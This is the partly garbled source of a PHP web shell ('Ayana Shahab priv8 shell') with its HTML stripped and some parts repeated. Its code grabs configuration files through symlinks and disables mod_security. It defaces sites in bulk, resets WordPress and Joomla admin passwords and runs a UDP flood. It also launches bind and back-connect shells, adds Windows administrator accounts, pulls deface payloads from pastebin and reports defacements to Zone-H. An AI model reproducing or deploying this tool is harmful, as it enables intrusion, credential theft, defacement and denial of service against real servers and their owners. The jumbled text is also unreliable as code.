".judul."

No.	Name	Size	Type	Group:Owner	Permission	Last Modified	Action
0		--	achan/link	achan:ayana	~	~	? make directory make file
".$no++."	$d2	".ukuranupil("$d/$d2")."	".$mime."	".owngro("$d/$d2")."	".perms("$d/$d2")."	".lmodif("$d/$d2")."	? Rename Delete Chmod
".$no++."	$f	".ukuranupil("$d/$f")."	".$mime."	".owngro("$d/$f")."	".perms("$d/$f")."	".lmodif("$d/$f")."	? Rename Edit Delete Chmod Download

No.	Website	Status
".$no++."	".$ah."	[vulnerable]
".$no++."	".$ah."	[not vulnerable]

Input string :
Hasil Hash
Original Password
MD5
MD4
MD5 with Salt
MD5 with Salt & Sha1
Sha1
Sha256
Sha1 with Salt
Sha1 with Salt & MD5

Enc0de & Dec0de + Conventer

'; $a = $_POST['e']; $o = $_POST['opt']; if(isset($_POST['c'])){ switch($o){ case'dechex'; $s= dechex($a); break; case'dechex'; $s= hexdec($a); break; case'decoct'; $s= decoct($a); break; case'octdec'; $s= octdec($a); break; case'decbin'; $s= decbin($a); break; case'bindec'; $s= bindec($a); break; case'hexbin'; $s= hex2bin($a); break; case'binhex'; $s= bin2hex($a); break; } echo'
:: OutPut ::
'; }elseif(isset($_POST['en'])){ switch($o){ case'url'; $r=urlencode($a); break; case'base64'; $r=base64_encode($a); break; case'urlbase64'; $r=urlencode(base64_encode($a)); break; case'gz64'; $r=base64_encode(gzdeflate($a)); break; case'sgz64'; $r=base64_encode(gzdeflate(str_rot13($a))); break; case's64'; $r=(base64_encode(str_rot13(gzdeflate(str_rot13($a))))); break; case'sb64'; $r=base64_encode(str_rot13($a)); break; case'64url'; $r=base64_encode(urlencode($a)); break; case'64u64u'; $r=base64_encode(urlencode(base64_encode(urlencode($a)))); break; case'cuu'; $r=convert_uuencode($a); break; case'sgzcuus64'; $r=base64_encode(str_rot13(convert_uuencode(gzdeflate(str_rot13($a))))); break; case'ss64'; $r=str_rot13(str_rot13(base64_encode($a))); break; } echo'
:: OutPut::
'; } //Dec0de if(isset($_POST['de'])){ switch($o){ case'url'; $r=urldecode($a); break; case'base64'; $r=base64_decode($a); break; case'urlbase64'; $r=base64_decode(urldecode($a)); break; case'gz64'; $r=gzinflate(base64_decode($a)); break; case'sgz64'; $r=str_rot13(gzinflate(base64_decode($a))); break; case's64'; $r=str_rot13(gzinflate(str_rot13(base64_decode($a)))); break; case'sb64'; $r=str_rot13(base64_decode($a)); break; case'64url'; $r=urldecode(base64_decode($a)); break; case'64u64u'; $r=urldecode(base64_decode(urldecode(base64_decode($a)))); break; case'cuu'; $r=convert_uudecode($a); break; case'sgzcuus64'; $r=str_rot13(gzinflate(convert_uudecode(str_rot13(base64_decode($a))))); break; case'ss64'; $r=base64_decode(str_rot13(str_rot13($a))); } $rx = htmlspecialchars($r); echo'
:: OutPut::
'; } }elseif ($_GET['a']=='rs') { echo"

auto replace string


Your string here	string will u replace
string replace	"; if(isset($_POST['sstr'])){ $rep=str_replace($_POST['str2'],$_POST['str3'],$_POST['str']); if($rep){ echo' '.htmlspecialchars($rep).''; } } echo "

"; }elseif ($_GET['a']=='logout') { session_destroy(); echo ""; }elseif ($_GET['a']=='achan') { echo tentangAchan(); }elseif ($_GET['a']=='jkt48') { echo tentangJKT48(); }elseif ($_GET['a']=='cg') { if(!file("/etc/passwd")){ $etcpasswd="/etc/passwd gak bisa di akses!";}else{ $etcpasswd= file_get_contents('/etc/passwd');} echo'

Config Grabber

'; echo'

'.$etcpasswd.'

'; if(isset($_POST['su'])) { mkdir('config_grab',0777); $r = " \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \n \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n"; $f = fopen('config_grab/.htaccess','w'); fwrite($f,$r); echo "
TOUCH ME SENPAI"; $usr=explode("\n",$_POST['user']); foreach($usr as $uss) { $us=trim($uss); $r="config_grab/"; symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config'); symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wp-config'); symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomla');symlink('/home/'.$us.'/public_html/wp/wp-config.php',$r.$us.'..wp-config'); symlink('/home/'.$us.'/public_html/wordpress/wp-congig.php',$r.$us.'..wordpress');symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config'); symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs'); symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs'); symlink('/home/'.$us.'/public_html/secure/configuration.php',$r.$us.'..securewhmcs'); symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-clients'); symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-client'); symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-billing'); symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-config'); } echo'berhasil!! touch me senpai..'; } }elseif ($_GET['a']=='af') { echo'

Admin finder

'; echo'

site :

'; function xss_protect($data, $strip_tags = false, $allowed_tags = "") { if($strip_tags) { $data = strip_tags($data, $allowed_tags . ""); } if(stripos($data, "script") !== false) { $result = str_replace("script","script", htmlentities($data, ENT_QUOTES)); } else { $result = htmlentities($data, ENT_QUOTES); } return $result; } function urlExist($url) { $handle = curl_init($url); if (false === $handle) { return false; } curl_setopt($handle, CURLOPT_HEADER, false); curl_setopt($handle, CURLOPT_FAILONERROR, true); curl_setopt($handle, CURLOPT_HTTPHEADER, Array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15") ); // request as if Firefox curl_setopt($handle, CURLOPT_NOBODY, true); curl_setopt($handle, CURLOPT_RETURNTRANSFER, false); $connectable = curl_exec($handle); curl_close($handle); return $connectable; } if(isset($_POST['submit']) && isset($_POST['url'])) { $url= htmlentities(xss_protect($_POST['url'])); if(filter_var($url, FILTER_VALIDATE_URL)) { $trying = array(':2082',':2083','a_admins/','admin/','adminweb/','po-admin','index.php?q=admin','administrator/','admin/admin.php','cpanel','admin3/','admin4/','admin5/','usuarios/', 'usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/', 'panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php', 'admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php', 'admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html', 'admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php', 'bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php', 'admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html', 'panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php', 'nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php', 'administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html', 'login.php','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php', 'pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php', 'adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php', 'admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html', 'login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html', 'panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html', 'adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php', 'adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php', 'panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php', 'adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php', 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin.asp','admin/admin.asp', 'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp', 'bb-admin/admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','user.asp','webadmin/index.asp', 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp', 'adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp', 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp', 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2/login.asp','admin2/index.asp','adm/index.asp', 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp'); echo ""; foreach($trying as $sec) { $urll=$url.'/'.$sec; if(urlExist($urll)) { echo ''; exit; } else { echo ''; } } echo ''; } else { echo ''; } echo "
Website Status
'.$urll.' FOUND
'.$urll.' NOT FOUND
Could not find admin page.[!]
invalid url Enteindigo
"; } }elseif ($_GET['a']=='md') { echo'

Mass deface
by indoXploit '; function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $dirb/$namafile
"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "
"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "
"; sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } } else { echo ""; echo " Tipe Sabun:
BiasaMassal
Folder:

Filename:

Index File:
JOYFULL KAWAII TRY TO BE THE BEST ;)
"; } }elseif ($_GET['a']=='jrp') { echo "

joomla reset password

"; if(empty($_POST['pwd'])){ echo "

Connect to mySQL

  Host

  Database

  username

  password

  new user

  new password(12345)

"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error()); if($SQL){ echo "Succesfully! password : 12345"; } } }elseif ($_GET['a']=='wprp') { echo "

wordpress reset password

"; if(empty($_POST['pwd'])){ echo "

Connect to mySQL server

  Hostname

  Database

  username

  password

  User baru

  Pass Baru

"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error()); if($a4s){ echo " Successfully! password changed! "; } } }elseif ($_GET['a']=='ddos') { echo"
DDoS Tools

"; echo'
IP Target :
Time :
Port :

'; $submit = $_POST['fire']; if (isset($submit)) { $packets = 0; $ip = $_POST['ip']; $rand = $_POST['port']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_POST['time']; $time = time(); print "Flooded: $ip on port $rand

"; $max_time = $time+$exec_time; for($i=0;$i<65535;$i++){ $out .= "X"; } while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; } }elseif ($_GET['a']=='net') { if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "
Process found running, backdoor setup successfully.
"; } else { $msg = "
Process not found running, backdoor not setup successfully.
"; } } // bind connect with perl elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "
Process found running, backdoor setup successfully.
"; } else { $msg = "
Process not found running, backdoor not setup successfully.
"; } } // back connect with c elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } // back connect with perl elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } echo'
NetSploit
Port Binding Connect Back Load and Exploit
'; echo'
Port
Password
Use

'; echo' '; echo'
IP
Port
Use
'; echo' '; echo'
url
cmd
'; echo'
'.$msg.'
'; }elseif ($_GET['a']=='zh') { echo'
Zone-H Mass Notifer
'; echo'

'; $url = explode("\r\n", $_POST['url']); $go = $_POST['go']; function kirim($target,$hacker) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_URL, "http://zone-h.org/notify/single"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array( "defacer" => $hacker, "domain1" => $target, "hackmode" => "1", "reason" => "1", )); $res = curl_exec($ch); curl_close($ch); return preg_match("/OK<\/font><\/li>/", $res); } if($go) { foreach($url as $sites) { if(kirim($sites,$_POST['depecer'])) { echo "
[ OK ] => $sites
"; } else { echo "
[ ERROR ] => $sites
"; } } } }elseif ($_GET['a']=='em') { $e=function_exists('mail'); if($e){ echo "
Email

"; echo"
from :
For:
Subject:
COntent: please..patch ur face! ur face is bad :p
"; }else{ echo" mail() function does not exists in this website!"; } if(isset($_POST['sent'])){ if(mail($_POST['for'],$_POST['subject'],$_POST['cont'],$_POST['from'])){ echo "send!!".$_POST['for']; }else{ echo"failed !!!"; } } }elseif ($_GET['a']=='sym') { system('ln -s / achan.txt'); $hta ="Options Indexes FollowSymLinks\nDirectoryIndex ssssss.htm\nAddType txt .php\nAddHandler txt .php"; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,$hta); $sym = symlink("/","achan.txt"); $rt="
touch me senpai..
"; echo "

Done.. !
".$rt; }elseif ($_GET['a']=='rdp') { if(strtolower(substr(PHP_OS, 0, 3)) === 'win') { echo "
Remote Desktop Protocol Tools
"; if($_POST['create']) { $user = htmlspecialchars($_POST['user']); $pass = htmlspecialchars($_POST['pass']); if(preg_match("/$user/", exe("net user"))) { echo "[INFO] -> user $user already exists"; } else { $add_user = exe("net user $user $pass /add"); $add_groups1 = exe("net localgroup Administrators $user /add"); $add_groups2 = exe("net localgroup Administrator $user /add"); $add_groups3 = exe("net localgroup Administrateur $user /add"); echo "[ RDP ACCOUNT INFO ]
------------------------------
IP: ".gethostbyname($_SERVER['HTTP_HOST'])."
Username: $user
Password: $pass
------------------------------

[ STATUS ]
------------------------------
"; if($add_user) { echo "[add user] -> Successfully :D
"; } else { echo "[add user] -> Failed !
"; } if($add_groups1) { echo "[add localgroup Administrators] -> Successfully :D
"; } elseif($add_groups2) { echo "[add localgroup Administrator] -> Successfully :D
"; } elseif($add_groups3) { echo "[add localgroup Administrateur] -> Successfully :D
"; } else { echo "[add localgroup] -> Failed !
"; } echo "------------------------------
"; } } elseif($_POST['s_opsi']) { $user = htmlspecialchars($_POST['r_user']); if($_POST['opsi'] == '1') { $cek = exe("net user $user"); echo "Checking username $user ....... "; if(preg_match("/$user/", $cek)) { echo "[ already Exists ]
------------------------------

$cek
"; } else { echo "[ Not Exists ]"; } } elseif($_POST['opsi'] == '2') { $cek = exe("net user $user achan"); if(preg_match("/$user/", exe("net user"))) { echo "[change password: achan] -> "; if($cek) { echo "Successfully :D"; } else { echo "Successfully :D"; } } else { echo "[INFO] -> user $user Not Exists"; } } elseif($_POST['opsi'] == '3') { $cek = exe("net user $user /DELETE"); if(preg_match("/$user/", exe("net user"))) { echo "[remove user: $user] -> "; if($cek) { echo "Successfully :D"; } else { echo "Failed :p"; } } else { echo "[INFO] -> user $user not exists"; } } else { // } } else { echo "-- Create RDP --

Username:
Password:

-- Option --

Username:
Options:

"; } }else{ echo "
This Tools Just Support in Windows Server.
"; } }elseif ($_GET['a']=='wos') { echo "

WithOutShadow Priv8 Script Deface

filename :
"; if(isset($_POST['wos'])){ $fp=fopen($_POST['wos'],"w"); $isi=file_get_contents('http://pastebin.com/raw/0Fm2SLTp'); if(fwrite($fp,$isi)){ echo ""; } fclose($fp); } }elseif ($_GET['a']=='ps') { echo "

PeSeC Priv8 Script Deface

filename :
"; if(isset($_POST['ps'])){ $fp=fopen($_POST['ps'],"w"); $isi=file_get_contents('http://pastebin.com/raw/SDHE0W4T'); if(fwrite($fp,$isi)){ echo ""; } fclose($fp); } }elseif ($_GET['a']=='fr') { ob_start(); function reverse($url) { $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) )))); $array = explode(",,", $resp); unset($array[0]); foreach($array as $lnk) { $lnk = "http://$lnk"; $lnk = str_replace(",", "", $lnk); echo $lnk."\n"; ob_flush(); flush(); } curl_close($ch); } function cek($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $resp = curl_exec($ch); return $resp; } $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if($_POST['reverse']) { $site = explode("\r\n", $_POST['url']); $file = $_POST['file']; foreach($site as $url) { $cek = cek("$url/~$user/$file"); if(preg_match("/hacked/", $cek)) { echo " URL: $url/~$user/$file -> Fake Root!
"; } } } else { echo "

Fake Root
By : indoXploit
Filename:

User:

Domain:
"; reverse($_SERVER['HTTP_HOST']); echo "

"; } }elseif ($_GET['a']=='themes') { $i=$_GET['i']; $c=$_GET['col']; if(empty($c)){ // ini bukan log atau semacamnya kok, ini cuma html doang -_-" kalo gk percaya decode aja. // alesan di encode biar waktu ganti tema ini gak ikut ke ganti. @eval(base64_decode("ZWNobyAiPGRpdiBjbGFzcz0ndzMtY29udGFpbmVyIHczLWNlbnRlcic+DQoJCTxoMyBjbGFzcz0ndzMtcmVkIHczLXRleHQtc2hhZG93IHczLXRleHQtd2hpdGUnPkdsb2JhbCBDb2xvcjwvaDM+IjsNCgllY2hvJyA8ZGl2IGNsYXNzPSJ3My1kcm9wZG93bi1ob3ZlciI+DQogIDxhIGNsYXNzPSJ3My1yZWQgdzMtYnRuIiBzdHlsZT0id2lkdGg6MzAwcHg7Ij5TRUxFQ1QgVEhFTUVTPC9hPg0KICA8ZGl2IGNsYXNzPSJ3My1kcm9wZG93bi1jb250ZW50IHczLWJvcmRlciIgc3R5bGU9IndpZHRoOjMwMHB4OyI+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1yZWQiICBjbGFzcz0idzMtcmVkIj5SRUQ8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1waW5rIiAgY2xhc3M9InczLXBpbmsiPlBJTks8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1vcmFuZ2UiIGNsYXNzPSJ3My1vcmFuZ2UiPk9SQU5HRTwvYT4NCiAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD15ZWxsb3ciICBjbGFzcz0idzMteWVsbG93Ij5ZRUxMT1c8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1ncmVlbiIgIGNsYXNzPSJ3My1ncmVlbiI+R1JFRU48L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD10ZWFsIiBjbGFzcz0idzMtdGVhbCI+VEVBTDwvYT4NCiAgICAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1jeWFuIiAgY2xhc3M9InczLWN5YW4iPkNZQU48L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1saW1lIiAgY2xhc3M9InczLWxpbWUiPkxJTUU8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1ibHVlIiBjbGFzcz0idzMtYmx1ZSI+QkxVRTwvYT4NCiAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1pbmRpZ28iICBjbGFzcz0idzMtaW5kaWdvIj5JTkRJR088L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1wdXJwbGUiICBjbGFzcz0idzMtcHVycGxlIj5QVVJQTEU8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1raGFraSIgY2xhc3M9InczLWtoYWtpIj5LSEFLSTwvYT4NCiAgPC9kaXY+DQo8L2Rpdj4gJzs=")); }else{ $fn=str_replace("/","",$_SERVER['SCRIPT_NAME']); $gc=file_get_contents($fn); $co=str_replace("indigo",$c,$gc); $fp=fopen($fn,"w"); if(fwrite($fp, $co)){ echo ""; }else{ echo "gagal"; } fclose($fp); } }elseif ($_GET['a']=='pass') { function a_gantipass($old,$new){ $file=str_replace("/","",$_SERVER['SCRIPT_NAME']); $getc=file_get_contents($file); $pw=str_replace("".$old."","".$new."",$getc); $fp=fopen($file,"w"); return fwrite($fp,$pw); fclose($fp); } echo "
Change Password
"; echo "
"; echo ""; echo""; echo"
Old password:
New password:
"; if(isset($_POST['sbmt'])){ $plama=md5($_POST['op']); $pbaru=md5($_POST['np']); if(a_gantipass($plama,$pbaru)){ echo ""; return session_destroy(); } } } } $end_html_a ="

"; $end_html_a.='
copyright © '.date('Y').' PeSec Team | PoweRed by : LinuxCode.org | Ayana Shahab priv8 shell By : shutdown57
'; $end_html_a.=''; echo $end_html_a; ?>

Name :	Ayana Shahab
Born :	Osaka, 3 June 1997 (age $usia)
Member :	JKT48 at Team K3
Career :	2011-2016 (JKT48 Team J) ,Dec 2016 (JKT48 Team K3)

file	Target Dir
'; echo' '; $form_a='	'; $form_a.='
'; $form_a.='	'; $form_a.='
'; $form_a.='	'; $form_a.='
'; $form_a.='	'; $form_a.='
'; $form_a.='	'; $form_a.='

DDoS Tools

NetSploit

Zone-H Mass Notifer

Email

Remote Desktop Protocol Tools

This Tools Just Support in Windows Server.

WithOutShadow Priv8 Script Deface

PeSeC Priv8 Script Deface

Fake Root

Change Password

Not Found

Ayana Shahab priv8 shell

linuxcode.org ~ WithOutShadow ~ PeSec Team

Thanks for :

God , You , sunr-15 , google.com ,pastebin.com , [-]sh4d0w_99[!] , MRG#7 , indoXploit , devilzc0de , StackOverFlow , w3schools , tutorialpoint

About ayana shahab

New name

View file

Edit file

Change Permission

Terminal Command Shell

Command Prompt

This Just Work in Windows Server.

SQL injection vulnerable checker

Database dumper

Mass Make Directory

Make File

Hash Identification

Password Hash

Enc0de & Dec0de + Conventer

auto replace string

Config Grabber

Admin finder

Mass deface

joomla reset password

wordpress reset password

	"; $d=str_replace('\\','/',$d); $path = explode('/',$d); foreach($path as $id=>$curdir){ if($curdir == '' && $id == 0){ $a = true; echo '/'; continue; } if($curdir == '') continue; echo ''.$curdir.'/'; } $pwd=str_replace('\\','/',getcwd()); (is_writable($d))?$stat=" ~ WRITABLE" :$stat="NOT WRITABLE"; echo $stat."

Website	Status
'.$urll.'	FOUND
'.$urll.'	NOT FOUND
Could not find admin page.[!]
invalid url Enteindigo

from :
For:
Subject:
COntent:	please..patch ur face! ur face is bad :p

Enter Hash	:
Result	:	'.$hashresult.'

Not Found

Ayana Shahab priv8 shell

linuxcode.org ~ WithOutShadow ~ PeSec Team

Thanks for :

God , You , sunr-15 , google.com ,pastebin.com , [-]sh4d0w_99[!] , MRG#7 , indoXploit , devilzc0de , StackOverFlow , w3schools , tutorialpoint

About ayana shahab

Uploader Files

New name

View file

Edit file

Change Permission

Terminal Command Shell

Command Prompt

This Just Work in Windows Server.

SQL injection vulnerable checker

Database dumper

Mass Make Directory

Make File

Hash Identification

Password Hash

Enc0de & Dec0de + Conventer

auto replace string

Config Grabber

Admin finder

Mass deface

joomla reset password

wordpress reset password

DDoS Tools

NetSploit

Zone-H Mass Notifer

Email

Remote Desktop Protocol Tools

This Tools Just Support in Windows Server.

WithOutShadow Priv8 Script Deface

PeSeC Priv8 Script Deface

Fake Root

Change Password